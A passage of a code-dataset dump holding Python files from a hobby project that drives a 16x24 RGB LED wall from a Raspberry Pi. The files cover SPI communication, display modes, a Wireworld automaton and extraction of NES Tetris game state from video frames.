0.6032099723815918, "avg_line_length": 29.310810089111328, "blob_id": "b5dd5e5f637d537108ad0e726b117331eb336d58", "content_id": "e7ba5f62f3322a2a45abda6e999b534a973d697e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2243, "license_type": "no_license", "max_line_length": 113, "num_lines": 74, "path": "/raspi_preproc/workbench/test_spi.py", "repo_name": "deepestcyber/rgb-tetris-wall", "src_encoding": "UTF-8", "text": "import serial\nimport time\nimport datetime\nimport base64\nimport pigpio\n\nUSBPORT = '/dev/ttyACM0' #check correct port first\n#USBPORT = 'COM3' #check correct port first\nNUM_LEDS_H = 16 #16\nNUM_LEDS_V = 24 #24\nFPS = 25\nWAITTIME_VSTREAM = 0.040 #40 ms\nWAITTIME_ISTREAM = 1.0 #40 ms\n\nb64dict = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'\n\n#s = serial.Serial(USBPORT, 115200) #57600 dc115200 230400\npi = pigpio.pi()\nif not pi.connected:\n print(\"could not connect spi\")\n exit()\n\n#spi = pi.spi_open(0, 115200)\nspi = pi.spi_open(0, 64000//2)\n\nleds = [[0 for i in range(NUM_LEDS_V)] for j in range(NUM_LEDS_H)]\ncounter = 0\ndelaycounter = 1\ndelay = 1 #FPS 1 for testing\ndata_read = 0\n\nprint(\"Start sending\")\ncnt = 0\nwhile True:\n timestart = datetime.datetime.now()\n\n #data_read = s.read(1)\n (num_bytes, data_read) = pi.spi_read(spi, 1)\n #(num_bytes, data_read) = (0,1)\n #data_read = int(data_read)\n # mode - video stream: 25 frames per second with 6 bit/px\n if (True or data_read==b'3'):\n for i in range(NUM_LEDS_H):\n for j in range(NUM_LEDS_V):\n #leds[i][j] = (4*(counter-i+j))%64\n #leds[i][j] = (4*(counter-i+j))%64\n #leds[i][j] = 256//NUM_LEDS_V*((counter+i+j)%NUM_LEDS_V)\n leds[i][j] = 1\n if (delaycounter%delay == 0):\n counter=(counter+1)%NUM_LEDS_H\n delaycounter=(delaycounter+1)%delay\n\n data_b64 = ''.join(b64dict[m] for n in leds for m in n)\n data_dec = base64.b64decode(data_b64)\n #print(len(data_b64),data_b64)\n 
#print(len(data_dec),data_dec)\n\n \n #pi.spi_write(spi, data_dec+b'\\n')\n cnt+=1\n pi.spi_write(spi, bytes('Take this: %d\\n\\n' % cnt, encoding=\"utf-8\"))\n print(\"CNT:\", cnt)\n #pi.spi_xfer(spi, data_dec)\n #s.write(bytes([m for n in leds for m in n])) #undecoded format\n #spi.flush()\n\n timefin = datetime.datetime.now()\n waittime = max(0.0,(WAITTIME_VSTREAM)-(0.000001*(timefin-timestart).microseconds))\n print(\"arduino_mode:\",data_read,\"process_t:\", 0.000001*(timefin-timestart).microseconds, \"wait_t:\", waittime)\n\n time.sleep(waittime) \n\npi.spi_close(spi)\npi.stop()\n" }, { "alpha_fraction": 0.6635220050811768, "alphanum_fraction": 0.7295597195625305, "avg_line_length": 25.5, "blob_id": "8df5c51d469b5e0323c3221783b22b00f06c3480", "content_id": "cf55c11b90ea66148dad7916269e01d70cff9bbf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 318, "license_type": "no_license", "max_line_length": 38, "num_lines": 12, "path": "/raspi_preproc/workbench/streaming/util/capture_single.py", "repo_name": "deepestcyber/rgb-tetris-wall", "src_encoding": "UTF-8", "text": "from pyv4l2.frame import Frame\nfrom pyv4l2.control import Control\n\nframe = Frame('/dev/video1')\nframe_data = frame.get_frame()\ncontrol = Control(\"/dev/video1\")\n#control.get_controls()\n#control.get_control_value(9963776)\n#control.set_control_value(9963776, 8)\n\nwith open('test.raw', 'wb') as f:\n f.write(frame_data)\n" }, { "alpha_fraction": 0.3816167414188385, "alphanum_fraction": 0.40131309628486633, "avg_line_length": 17.8914737701416, "blob_id": "598becc7949b7467951ef663658e0b2b022375a8", "content_id": "d1dcc69498eeec879e3d08810ed69a43fc555eff", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2437, "license_type": "no_license", "max_line_length": 70, "num_lines": 129, "path": "/reels/wireworld.py", "repo_name": "deepestcyber/rgb-tetris-wall", "src_encoding": "UTF-8", 
"text": "\"\"\"\"\nWireworld Reel\n\nImplementation for Wireworld for our RGB-Wall\n\nSee https://en.wikipedia.org/wiki/Wireworld\n\nTODO: multiple board layouts to chose from by program parm\nTODO: set board layout by program parm\n\nCreated by kratenko\n\"\"\"\n\nimport numpy as np\nimport time\n\nfrom fluter import Fluter\n\nfluter = Fluter()\nW, H = 16, 24\n\nEMPTY = 0\nWIRE = 1\nHEAD = 2\nTAIL = 3\n\nb_xor = \"\"\"\n..............x.\n....x.....x...x.\n...x.o...x.o..x.\n...x.+...x.+..x.\n...x.x...x.x..x.\n...+.x...x.x..x.\n...o.x...x.x..x.\n...x.x...x.x..x.\n...x.x...x.o..x.\n...x.x...x.+..x.\n....x.....x...x.\n....x.....x...x.\n....x.....x...x.\n....x.....x...x.\n....x.xxx.x...x.\n.....xx.xx....x.\n......x.x.....x.\n......xxx.....x.\n.......x......x.\n.......x......x.\n.......x......x.\n.......x......x.\n........xxxxxx..\n................\n\"\"\"\n\n\ndef build_field(s):\n f = np.zeros((H, W), dtype=np.uint8)\n y = -1\n for line in s.split(\"\\n\"):\n line = line.strip()\n if not line:\n continue\n y += 1\n if y >= H:\n break\n for x, c in enumerate(line):\n if x >= W:\n break\n t = EMPTY\n if c == \"x\":\n t = WIRE\n elif c == \"+\":\n t = HEAD\n elif c == \"o\":\n t = TAIL\n f[y, x] = t\n return f\n\n\ndef moore_neigh(pos):\n y, x = pos\n n = ((y - 1, x - 1), (y - 1, x), (y - 1, x + 1),\n (y, x - 1), (y, x + 1),\n (y + 1, x - 1), (y + 1, x), (y + 1, x + 1))\n n = tuple(pos for pos in n if 0 <= pos[1] < W and 0 <= pos[0] < H)\n return n\n\n\ndef count_neigh_heads(f, pos):\n n = moore_neigh(pos)\n s = 0\n for p in n:\n if f[p] == HEAD:\n s += 1\n return s\n\n\ndef step(f):\n o = f.copy()\n for y in range(0, H):\n for x in range(0, W):\n if f[y, x] == HEAD:\n o[y, x] = TAIL\n elif f[y, x] == TAIL:\n o[y, x] = WIRE\n elif f[y, x] == WIRE:\n if 1 <= count_neigh_heads(f, (y, x)) <= 2:\n o[y, x] = HEAD\n return o\n\n\ndef send(f):\n empty = [0, 0, 0]\n wire = [0xff, 0xff, 0]\n head = [0, 0, 0xff]\n tail = [0xff, 0, 0]\n d = np.zeros((H, W, 3), dtype=np.uint8)\n d[f 
== EMPTY] = empty\n d[f == WIRE] = wire\n d[f == HEAD] = head\n d[f == TAIL] = tail\n fluter.send_array(d)\n\n\nf = build_field(b_xor)\n\nwhile True:\n send(f)\n f = step(f)\n time.sleep(.2)\n" }, { "alpha_fraction": 0.5093240141868591, "alphanum_fraction": 0.560606062412262, "avg_line_length": 25.8125, "blob_id": "c6f0a03f65be207f85c05c7ba1997dd1f14252c4", "content_id": "93da438566d067cb06374edeeb1a5867fe8c8bdd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 858, "license_type": "no_license", "max_line_length": 57, "num_lines": 32, "path": "/raspi_preproc/workbench/streaming/lib/cropping.py", "repo_name": "deepestcyber/rgb-tetris-wall", "src_encoding": "UTF-8", "text": "# QnD extraction pixels from screenshot\nfrom PIL import Image\n\n\ndef extract_single_player_area(im, area=None):\n if area is None:\n area = (96, 40, 96+10*8, 40+20*8)\n return im.crop(area)\n\ndef extract_square(im, coords):\n sx, sy = coords\n square = (sx*8, sy*8, (sx+1)*8, (sy+1)*8)\n return im.crop(square)\n\ndef extract_colours(area):\n print(area)\n a = area.crop((0, 0, 10, 20)).copy()\n dx = area.width / 10\n dy = area.height / 20\n print(dx, dy)\n for y in range(20):\n for x in range(10):\n at = (int(x*dx + (dx/2)), int(y*dy + (dy/2)))\n pix = area.getpixel(at)\n a.putpixel((x, y), pix)\n print(a)\n return a\n\nif __name__ == \"__main__\":\n im = Image.open(\"img/Tetris (USA)-10.png\")\n area = extract_single_player_area(im)\n extract_colours(area).resize((8*10, 8*20)).show()\n" }, { "alpha_fraction": 0.5200076699256897, "alphanum_fraction": 0.5453156232833862, "avg_line_length": 38.06716537475586, "blob_id": "3d35ea41780499035820745a0f8d422feaf7e2f7", "content_id": "f14d9e0d78472a68e4fe3ddf00cc495ddd0464d6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10471, "license_type": "no_license", "max_line_length": 178, "num_lines": 268, "path": 
"/raspi_preproc/controller.py", "repo_name": "deepestcyber/rgb-tetris-wall", "src_encoding": "UTF-8", "text": "import datetime\nimport numpy as np\nimport pigpio\nfrom threading import Thread\nfrom queue import Queue\nimport time\nimport sys\nfrom utils_ui import Logger\nimport stream_pixelflut as pixelflut\n#import sys\n#sys.path.append(\"..\")\n#from pixelflut import pixelflut\nfrom stream_nes import StreamNES\nfrom image_loader import ImageLoader\nfrom audio_beatdetection import AudioBeatdetection\n\nDEBUG_MODE = True\n\nexptime = datetime.datetime.now()\nlog_out_file = \"logs/log_\" + exptime.strftime(\"%y%m%d%H%M\") + \".txt\"\nsys.stdout = Logger(output_file=log_out_file)\nis_first_loop = True\n\nprint(\"rgb-tetris-wall raspi reprocessing - start -\", exptime.strftime(\"%y%m%d%H%M\"))\n\nif DEBUG_MODE:\n print(\"debug -\", \"raspberry PI preprocessing - start\")\n\nUSBPORT = '/dev/ttyACM0' # check correct port first\n# USBPORT = 'COM3' #check correct port first\nNUM_LEDS_H = 16 # 16\nNUM_LEDS_V = 24 # 24\nFPS = 25\nPOLL_GRACE_PERIOD = 0.001 # mainly for debug.\n#waittime_until_next_image = 30.0 # change the random image every 5 minutes\nthreshold_until_next_image = 10 # change the random image every 10th time.\n#time_last_istream_change = datetime.datetime.now()\nnext_image_counter = threshold_until_next_image\n\nb64dict = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'\n\n# initialise SPI\npi = pigpio.pi()\nif not pi.connected:\n print(\"could not connect SPI\")\n exit()\nspi = pi.spi_open(0, 500000, 0) # 243750 487500 975000 1950000\n\n# initialise pin to arduino for flagging synchronisation\nSYNC_PIN = 24 # GPIO pin numbers\npi.set_mode(SYNC_PIN, pigpio.INPUT) # define pulldown/pullup\n\nleds = np.zeros((NUM_LEDS_H, NUM_LEDS_V, 3), dtype='uint8')\nmode = 0\nsubmode = [0 for n in range(256)]\n\niloader = ImageLoader(_num_leds_h=NUM_LEDS_H, _num_leds_v=NUM_LEDS_V)\nstrmnes = StreamNES(_num_leds_h=NUM_LEDS_H, _num_leds_v=NUM_LEDS_V, 
_ntsc=True)\nabeatd = AudioBeatdetection(_num_leds_h=NUM_LEDS_H, _num_leds_v=NUM_LEDS_V)\npixelflut_queue = Queue()\npixelflut_thread = Thread(target=pixelflut.threaded,\n args=(pixelflut_queue,'pixelflut_brain.py'))\npixelflut_thread.start()\npixelflut_read = pixelflut_queue.get(timeout=5)\n\ntime.sleep(0.4) # some needed initial delay\n\ndef decodeByte2Mode(byte):\n # first two bits code the mode and remaining 6 bits code the submode\n return (byte >> 6) + 1, byte & ~(3 << 6)\n\ndef read_mode_SPI():\n (num, byte) = pi.spi_read(spi, 1)\n if num == 1:\n mode, submode = decodeByte2Mode(byte[0])\n if DEBUG_MODE:\n print(\"debug -\", \"read mode\", \"received_data:\", num, byte[0], \"received_mode:\", mode, \"received_submode:\", submode)\n return (mode, submode)\n\ndef send_SPI(data):\n if DEBUG_MODE:\n print(\"debug -\", \"sending bytes:\", len(data))\n pi.spi_write(spi, data)\n\nwhile True:\n try:\n timestart = datetime.datetime.now()\n if DEBUG_MODE:\n timeproc = timesend = timestart\n\n if DEBUG_MODE:\n print(\"debug -\", \"waiting for SPI\", \"pi.read_bank_1:\", pi.read_bank_1())\n\n while ((pi.read_bank_1() >> SYNC_PIN) & 1) != 1:\n pass # just wait, until the sync pin is set\n\n if DEBUG_MODE:\n print(\"debug - got SPI\")\n\n if ((pi.read_bank_1() >> SYNC_PIN) & 1) == 1:\n\n #(new_mode, new_submode) = request_mode_SPI()\n #time.sleep(0.001)\n (new_mode, new_submode) = read_mode_SPI()\n\n is_modes_changed = True\n if mode == new_mode and submode[mode] == new_submode:\n is_modes_changed = False\n if DEBUG_MODE:\n print(\"debug -\", \"change:\", is_modes_changed, \"new_mode:\", new_mode, \"new_submode:\", new_submode, \"prev_mode:\", mode, \"prev_submode:\", submode[mode])\n else:\n if (is_first_loop): #just for logging\n is_first_loop = False\n print(\"first read mode byte from arduino -\", \"new_mode:\", new_mode, \"new_submode:\", new_submode)\n\n mode = new_mode\n submode[mode] = new_submode\n\n\n if (mode == 4): # mode for stream of beat-patterns\n\n if 
DEBUG_MODE:\n timeproc = datetime.datetime.now()\n\n #TODO calculate LEDS\n leds = np.zeros((NUM_LEDS_H, NUM_LEDS_V, 3), dtype='uint8')\n\n if DEBUG_MODE:\n timesend = datetime.datetime.now()\n data_enc = leds.transpose(1, 0, 2).flatten().tobytes()\n send_SPI(data_enc)\n\n\n elif (mode == 3): #mode for stream from NES/video\n\n \"\"\" in the NES mode the new frame needs to get determined \n WHILE the arduino is writing the old frame to the leds\n in order to parallelise these two expensive computations\n and meet the speed requirements of max 40ms per frame \"\"\"\n\n if DEBUG_MODE:\n timesend = datetime.datetime.now()\n if not is_modes_changed:\n # last turn the mode was the same, thus the calculated frame should be valid\n\n data_enc = leds.transpose(1, 0, 2).flatten().tobytes()\n #decode pixels from 24-bit into 6-bit (64-colour palette)\n #data_b64 = ''.join(b64dict[m] for n in leds for m in n)\n #data_dec = base64.b64decode(data_b64)\n #print(\"debug -\", \"len(data_b64):\", len(data_b64), \"data_b64:\", data_b64)\n #print(\"debug -\", \"len(data_dec):\", len(data_dec), \"data_dec:\", data_dec)\n send_SPI(data_enc)\n\n # calculate new frame:\n if DEBUG_MODE:\n timeproc = datetime.datetime.now()\n\n #TODO: needs debugging!\n # if is_modes_changed:\n # if submode[1] == 1:\n # strmnes = StreamNES(_ntsc=False)\n # else:\n # strmnes = StreamNES(_ntsc=True)\n\n leds = strmnes.read_frame()\n\n if DEBUG_MODE:\n print(\"debug -\", \"leds:\", leds.shape)\n\n\n elif (mode == 2): #mode for pixelflut\n\n \"\"\" TODO documentation \"\"\"\n\n if DEBUG_MODE:\n timesend = datetime.datetime.now()\n\n if not is_modes_changed:\n data_enc = leds.flatten().tobytes()\n #data_enc = leds.transpose(1, 0, 2).flatten().tobytes()\n send_SPI(data_enc)\n\n if DEBUG_MODE:\n timeproc = datetime.datetime.now()\n\n leds = pixelflut_read()\n\n\n elif (mode == 1): # mode for stream of images\n if DEBUG_MODE:\n timeproc = datetime.datetime.now()\n\n now = datetime.datetime.now()\n #if 
is_modes_changed or ((now - time_last_istream_change).seconds + (now - time_last_istream_change).microseconds*0.000001 > waittime_until_next_image):\n if is_modes_changed or (next_image_counter >= (threshold_until_next_image - 1)):\n \"\"\" \n if DEBUG_MODE:\n print(\"debug -\", \"new image:\", submode[1],\n \"last_image_t:\", \"{0:.2f}\".format(round((now - time_last_istream_change).seconds * 1000 + (now - time_last_istream_change).microseconds / 1000, 2)),\n \"wait_next_image_t:\", \"{0:.2f}\".format(\n round(waittime_until_next_image * 1000, 2)),\n \"(ms)\")\n \"\"\"\n if DEBUG_MODE:\n print(\"debug -\", \"new image:\", submode[1],\n \"counter:\", next_image_counter)\n if submode[1] == 0:\n leds = iloader.load_random_image()\n else:\n leds = iloader.load_numbered_image(submode[1])\n #time_last_istream_change = datetime.datetime.now()\n next_image_counter = 0\n else:\n next_image_counter += 1\n\n if DEBUG_MODE:\n print(\"debug -\", \"leds:\", leds.shape)\n if DEBUG_MODE:\n timesend = datetime.datetime.now()\n data_enc = leds.transpose(1, 0, 2).flatten().tobytes()\n send_SPI(data_enc)\n\n\n else: #mode == 0 # no stream\n if DEBUG_MODE:\n timeproc = datetime.datetime.now()\n if DEBUG_MODE:\n print(\"debug -\", \"Nothing to see here\")\n pass\n leds = np.zeros((NUM_LEDS_H, NUM_LEDS_V, 3), dtype='uint8')\n if DEBUG_MODE:\n timesend = datetime.datetime.now()\n data_enc = leds.transpose(1, 0, 2).flatten().tobytes()\n send_SPI(data_enc)\n\n\n timefin = datetime.datetime.now()\n waittime = max(0.0, (POLL_GRACE_PERIOD) - ((timefin - timestart).microseconds*0.000001 + (timefin - timestart).seconds))\n\n if DEBUG_MODE:\n\n if timeproc > timesend:\n handshake_delta_t = (timesend - timestart).microseconds/1000 + (timesend - timestart).seconds*1000\n send_delta_t = (timeproc - timesend).microseconds/1000 + (timeproc - timesend).seconds*1000\n proc_delta_t = (timefin - timeproc).microseconds/1000 + (timefin - timeproc).seconds*1000\n else:\n handshake_delta_t = (timeproc - 
timestart).microseconds/1000 + (timeproc - timestart).seconds*1000\n proc_delta_t = (timesend - timeproc).microseconds/1000 + (timesend - timeproc).seconds*1000\n send_delta_t = (timefin - timesend).microseconds/1000 + (timefin - timesend).seconds*1000\n\n print(\"debug -\", \"arduino mode:\", mode, \"submode:\", submode[mode],\n \"handshake_t:\", \"{0:.2f}\".format(round(handshake_delta_t,2)),\n \"process_t:\", \"{0:.2f}\".format(round(proc_delta_t,2)),\n \"send_t:\", \"{0:.2f}\".format(round(send_delta_t,2)),\n \"wait_t:\", \"{0:.2f}\".format(round(waittime*1000,2)),\n \"(ms)\")\n\n time.sleep(waittime)\n except KeyboardInterrupt:\n break\n\nif DEBUG_MODE:\n print(\"debug -\", \"raspberry PI preprocessing - closing\")\n\ntime.sleep(0.2)\npi.spi_close(spi)\ntime.sleep(0.2)\npi.stop()\n\n" }, { "alpha_fraction": 0.4424371123313904, "alphanum_fraction": 0.5074743032455444, "avg_line_length": 36.24010467529297, "blob_id": "a7e4b95064cf59bee437486c16df67b0467183c5", "content_id": "105f8397c95c70a2a8101a48f7a64c338e6589af", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 14115, "license_type": "no_license", "max_line_length": 143, "num_lines": 379, "path": "/raspi_preproc/nes_tetris.py", "repo_name": "deepestcyber/rgb-tetris-wall", "src_encoding": "UTF-8", "text": "from PIL import Image\nfrom PIL import ImageFilter\nfrom PIL import ImageEnhance\n\n_FORMAT = \"RGB\" #HSV\n_COLOR_ENHANCE_FACTOR = 3.0\n\n\nclass NesTetris:\n\n\n #def __init__(self, _num_leds_h=16, _num_leds_v=24, _gray=(95, 7, 128)): #RGB\n def __init__(self, _num_leds_h=16, _num_leds_v=24, _gray=(116, 116, 108)): #HSV\n\n self.num_h = _num_leds_h\n self.num_v = _num_leds_v\n self.gray = _gray\n self.black = (0, 0, 0)\n\n self.hsv_pixel = Image.new(\"HSV\", (1, 1), 0) # for the score rainbow\n self.img_leds = Image.new(_FORMAT, (_num_leds_h, _num_leds_v), 0)\n #print(\"debug -\", \"leds_init:\", np.array(self.img_leds, dtype=np.uint8).shape)\n\n # 
frame play area\n for y in range(2, 24):\n self.img_leds.putpixel((0, y), _gray)\n self.img_leds.putpixel((11, y), _gray)\n for x in range(0, 12):\n self.img_leds.putpixel((x, 2), _gray)\n self.img_leds.putpixel((x, 23), _gray)\n\n # frame next block area\n for x in range(12, 16):\n self.img_leds.putpixel((x, 10), _gray)\n self.img_leds.putpixel((x, 15), _gray)\n # score/lines/level areas\n for x in range(12, 16):\n self.img_leds.putpixel((x, 2), _gray)\n self.img_leds.putpixel((x, 23), _gray)\n\n return\n\n\n def reset_areas(self):\n # play area\n for y in range(3, 23):\n for x in range(1, 11):\n self.img_leds.putpixel((x, y), self.black)\n # next block area\n for y in range(11, 15):\n for x in range(12, 16):\n self.img_leds.putpixel((x, y), self.black)\n # lines areas\n for y in range(3, 10):\n for x in range(12, 16):\n self.img_leds.putpixel((x, y), self.black)\n # level areas\n for y in range(16, 23):\n for x in range(12, 16):\n self.img_leds.putpixel((x, y), self.black)\n\n return\n\n\n def enhance_image(self, img):\n converter = ImageEnhance.Color(img)\n return converter.enhance(_COLOR_ENHANCE_FACTOR)\n\n\n def is_pix_white(self, pix):\n if (pix[0] >= 128) and (pix[1] >= 128) and (pix[2] >= 128): #RGB\n #if (pix[2]) >= 128: #HSV\n return True\n return False\n\n\n def is_pix_black(self, pix):\n if (pix[0] < 48) and (pix[1] < 48) and (pix[2] < 48): #RGB\n #if (pix[2]) < 48: #HSV\n return True\n return False\n\n\n def get_number(self, img):\n #img.convert(\"RGB\").save(\"debug2.png\", \"PNG\")\n number = 0\n\n #read\n if not self.is_pix_white(img.getpixel((12, 3))):\n if self.is_pix_white(img.getpixel((2, 2))):\n if self.is_pix_white(img.getpixel((17, 2))):\n number = 7\n else:\n number = 5\n elif self.is_pix_white(img.getpixel((2, 9))):\n if self.is_pix_white(img.getpixel((17, 6))):\n number = 8\n else:\n number = 6\n else:\n if self.is_pix_white(img.getpixel((17, 14))):\n number = 2\n else:\n number = 9\n else:\n if self.is_pix_white(img.getpixel((12, 12))):\n 
if self.is_pix_white(img.getpixel((17, 14))):\n number = 1\n else:\n number = 4\n else:\n if self.is_pix_white(img.getpixel((17, 2))):\n number = 3\n else:\n number = 0\n\n #print(\"debug number:\", str(number))\n\n return number\n\n\n def test_pixel(self, img, x, y, is_white=True):\n pix = img.getpixel((x, y))\n if is_white:\n return self.is_pix_white(pix)\n else:\n return self.is_pix_black(pix)\n\n\n # def get_enhanced_pixel(self, img, x, y):\n # img_pix = self.enhance_image(img.crop((x, y, x+1, y+1)))\n # return img_pix.getpixel((0, 0))\n\n\n def test_tetris_runnig(self, img):\n # if not self.test_pixel(img, 54, 59, is_white=False):\n # return False\n # if not self.test_pixel(img, 197, 142, is_white=False):\n # return False\n # if not self.test_pixel(img, 484, 350, is_white=False):\n # return False\n # if not self.test_pixel(img, 536, 101, is_white=False):\n # return False\n # if not self.test_pixel(img, 546, 321, is_white=True):\n # return False\n # if not self.test_pixel(img, 370, 53, is_white=True):\n # return False\n # if not self.test_pixel(img, 67, 154, is_white=True):\n # return False\n # if not self.test_pixel(img, 109, 387, is_white=True):\n # return False\n if not self.test_pixel(img, 54, 59, is_white=False):\n return False\n if not self.test_pixel(img, 197, 142, is_white=False):\n return False\n if not self.test_pixel(img, 484, 350, is_white=False):\n return False\n if not self.test_pixel(img, 536, 101, is_white=False):\n return False\n if not self.test_pixel(img, 567, 330, is_white=True):\n return False\n if not self.test_pixel(img, 370, 54, is_white=True):\n return False\n if not self.test_pixel(img, 67, 144, is_white=True):\n return False\n if not self.test_pixel(img, 109, 387, is_white=True):\n return False\n # if not self.is_pix_black(img.getpixel((54, 59))):\n # return False\n # if not self.is_pix_black(img.getpixel((197, 142))):\n # return False\n # if not self.is_pix_black(img.getpixel((484, 350))):\n # return False\n # if not 
self.is_pix_black(img.getpixel((536, 101))):\n # return False\n # if not self.is_pix_white(img.getpixel((546, 321))):\n # return False\n # if not self.is_pix_white(img.getpixel((370, 53))):\n # return False\n # if not self.is_pix_white(img.getpixel((67, 154))):\n # return False\n # if not self.is_pix_white(img.getpixel((109, 387))):\n # return False\n\n return True\n\n\n def extract_game_area(self, im, area=None, ntsc=True):\n if ntsc:\n if area is None:\n area = (43, 0, 43 + 642, 0 + 478)\n else:\n if area is None:\n area = (41, 42, 41 + 642, 42 + 478)\n return im.crop(area)\n\n\n def extract_colours(self, img):\n #img.convert(\"RGB\").save(\"debug.png\", \"PNG\")\n #img = self.enhance_image(img)\n\n for y in range(20):\n for x in range(10):\n at = (1 + x * 20 + 10, 1 + y * 16 + 9)\n if not self.is_pix_black(img.getpixel(at)):\n pix = img.getpixel(at)\n else:\n pix = self.black\n self.img_leds.putpixel((1 + x, 3 + y), pix)\n\n return\n\n\n def extract_next_block(self, img):\n #img.convert(\"RGB\").save(\"debug.png\", \"PNG\")\n #img = self.enhance_image(img)\n\n #read\n if not self.is_pix_black(img.getpixel((5, 18))):\n next_block = 6\n next_block_col = img.getpixel((5, 18))\n elif not self.is_pix_black(img.getpixel((15, 9))):\n if not self.is_pix_black(img.getpixel((35, 26))):\n if not self.is_pix_black(img.getpixel((55, 9))):\n next_block = 0\n else:\n next_block = 2\n else:\n if not self.is_pix_black(img.getpixel((15, 26))):\n next_block = 5\n else:\n next_block = 1\n next_block_col = img.getpixel((15, 9))\n else:\n if not self.is_pix_black(img.getpixel((62, 10))):\n next_block = 4\n next_block_col = img.getpixel((62, 10))\n else:\n next_block = 3\n next_block_col = img.getpixel((50, 9))\n\n #write\n for x in range(0, 4):\n self.img_leds.putpixel((12+x, 12), self.black)\n self.img_leds.putpixel((12+x, 13), self.black)\n if next_block == 0:\n for x in range(0, 3):\n self.img_leds.putpixel((12+x, 12), next_block_col)\n self.img_leds.putpixel((13, 13), 
next_block_col)\n elif next_block == 1:\n for x in range(0, 3):\n self.img_leds.putpixel((12+x, 12), next_block_col)\n self.img_leds.putpixel((14, 13), next_block_col)\n elif next_block == 2:\n for x in range(0, 2):\n self.img_leds.putpixel((12+x, 12), next_block_col)\n self.img_leds.putpixel((13+x, 13), next_block_col)\n elif next_block == 3:\n for x in range(0, 2):\n self.img_leds.putpixel((13+x, 12), next_block_col)\n self.img_leds.putpixel((13+x, 13), next_block_col)\n elif next_block == 4:\n for x in range(0, 2):\n self.img_leds.putpixel((13+x, 12), next_block_col)\n self.img_leds.putpixel((12+x, 13), next_block_col)\n elif next_block == 5:\n for x in range(0, 3):\n self.img_leds.putpixel((12+x, 12), next_block_col)\n self.img_leds.putpixel((12, 13), next_block_col)\n else: #next_block == 6:\n for x in range(0, 4):\n self.img_leds.putpixel((12+x, 12), next_block_col)\n\n\n def extract_score(self, img):\n #img.convert(\"RGB\").save(\"debug.png\", \"PNG\")\n #read\n score = 0 \\\n + 100000 * self.get_number(img.crop((1, 0, 1 + 20, 16))) \\\n + 10000 * self.get_number(img.crop((21, 0, 21 + 20, 16))) \\\n + 1000 * self.get_number(img.crop((41, 0, 41 + 20, 16))) \\\n + 100 * self.get_number(img.crop((62, 0, 62 + 20, 16))) \\\n + 10 * self.get_number(img.crop((82, 0, 82 + 20, 16))) \\\n + self.get_number(img.crop((102, 0, 102 + 20, 16)))\n\n #write\n for i in range(max(int(score/10000), 0), 32):\n self.img_leds.putpixel((0 + int(i/2), 0 + i%2), self.black)\n for i in range(min(int(score/10000), 32)):\n self.hsv_pixel.putpixel((0, 0), (max(186-i*6, 0), 255, 128))\n self.img_leds.putpixel((0 + int(i/2), 0 + i%2), self.hsv_pixel.convert(_FORMAT).getpixel((0,0)))\n #\"self.img_leds.putpixel((0 + int(i/2), 0 + i%2), (max(186-i*6, 0), 255, 128))\n\n #print(\"debug score\", score)\n\n\n def extract_level(self, img):\n #img.convert(\"RGB\").save(\"debug.png\", \"PNG\")\n #read\n level = 0 \\\n + 10 * self.get_number(img.crop((0, 0, 20, 16))) \\\n + 
self.get_number(img.crop((20, 0, 40, 16)))\n #write\n for i in range(max(level, 0), 28):\n self.img_leds.putpixel((12 + int(i/7), 16 + i%7), self.black)\n for i in range(min(level+1,28)):\n self.hsv_pixel.putpixel((0, 0), (max(180-i*6, 0), 255, 128))\n self.img_leds.putpixel((12 + int(i/7), 16 + i%7), self.hsv_pixel.convert(_FORMAT).getpixel((0,0)))\n #self.img_leds.putpixel((12 + int(i/7), 16 + i%7), (max(180-i*6, 0), 255, 128))\n\n #print(\"debug level\", level)\n\n\n def extract_lines(self, img):\n #img.convert(\"RGB\").save(\"debug.png\", \"PNG\")\n #read\n lines = 0 \\\n + 100 * self.get_number(img.crop((1, 0, 20, 16))) \\\n + 10 * self.get_number(img.crop((21, 0, 41, 16))) \\\n + self.get_number(img.crop((41, 0, 61, 16)))\n #write\n for i in range(max(int(lines/10), 0), 28):\n self.img_leds.putpixel((12 + int(i/7), 3 + i%7), self.black)\n for i in range(min(int(lines/10)+1, 28)):\n self.hsv_pixel.putpixel((0, 0), (max(180-i*6, 0), 255, 128))\n self.img_leds.putpixel((12 + int(i/7), 3 + i%7), self.hsv_pixel.convert(_FORMAT).getpixel((0,0)))\n #self.img_leds.putpixel((12 + int(i/7), 3 + i%7), (max(180-i*6, 0), 255, 128))\n\n #print(\"debug lines\", lines)\n\n\n def transform_frame(self, img):\n # check if game is running\n if not self.test_tetris_runnig(img):\n self.reset_areas()\n return self.img_leds\n\n # play area\n #self.extract_colours(img.crop((239, 93, 240 + 10 * 20, 94 + 20 * 16)).convert(\"HSV\").filter(ImageFilter.SMOOTH))\n self.extract_colours(img.crop((239, 93, 240 + 10 * 20, 94 + 20 * 16)).filter(ImageFilter.SMOOTH))\n #self.extract_colours(img.crop((239, 93, 240 + 10 * 20, 94 + 20 * 16)))\n\n # next block\n self.extract_next_block(img.crop((482, 237, 482 + 81, 237 + 33)).filter(ImageFilter.SMOOTH))\n #self.extract_next_block(img.crop((482, 237, 482 + 81, 237 + 33)))\n\n # number of lines\n self.extract_lines(img.crop((380, 45, 380 + 61, 45 + 16)).filter(ImageFilter.SMOOTH))\n #self.extract_lines(img.crop((380, 45, 380 + 61, 45 + 16)))\n\n # 
